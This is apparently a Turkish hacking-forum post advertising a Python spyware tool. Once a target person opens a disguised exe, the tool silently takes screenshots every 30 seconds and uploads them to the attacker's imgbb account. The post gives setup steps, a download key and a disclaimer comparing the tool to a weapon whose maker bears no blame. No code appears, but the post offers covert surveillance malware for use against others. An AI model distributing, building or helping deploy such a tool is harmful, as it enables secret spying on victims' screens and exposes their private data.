Merhaba, Python ile bir araç hazırladım. Bu aracın amacı, hedef kişinin bilgisayarında bir exe dosyasını açarak ekran görüntüsünü belirli aralıklarla alıp bize resim olarak gönderen bir sistem sağlamaktır.
Kullanım Sorumluluğu: Bu aracın kullanımı tamamen kullanıcıya bağlıdır ve beni bağlamaz. Ben sadece geliştirme yapıp paylaşırım. Talep ve ilgi olursa daha iyi projeler de hazırlayabilirim. Şöyle düşünün: birisi bir silah üretir, kimisi suça karışır, kimisi de suçla mücadele için kullanır. Bu silahı üreten kişi sorumlu tutulmaz; önemli olan teknolojinin nasıl kullanıldığıdır. İyi forumlar dilerim.
Kurulum Adımları:
- İlk olarak, imgbb.com sitesine üye olun ve Google'da "imgbb API" aratarak API anahtarınızı alın.
- Aracımızı kullanabilmek için gerekli kütüphaneleri kurun. İsterseniz video izleyerek adım adım bu işlemleri yapabilirsiniz.
- Ardından, aracı çalıştırıp aldığınız API anahtarını girin. Artık sistem hazır. Araç, hedefteki exe dosyasının açılmasıyla, her 30 saniyede bir ekran görüntülerini size resim olarak gönderecektir.
Download
Key : 9WpuWXskuaBmTtBrA1OB7g
Virüs Total
Eğer sorun olursa özelden bana yazın yardımcı olmaya çalışırım...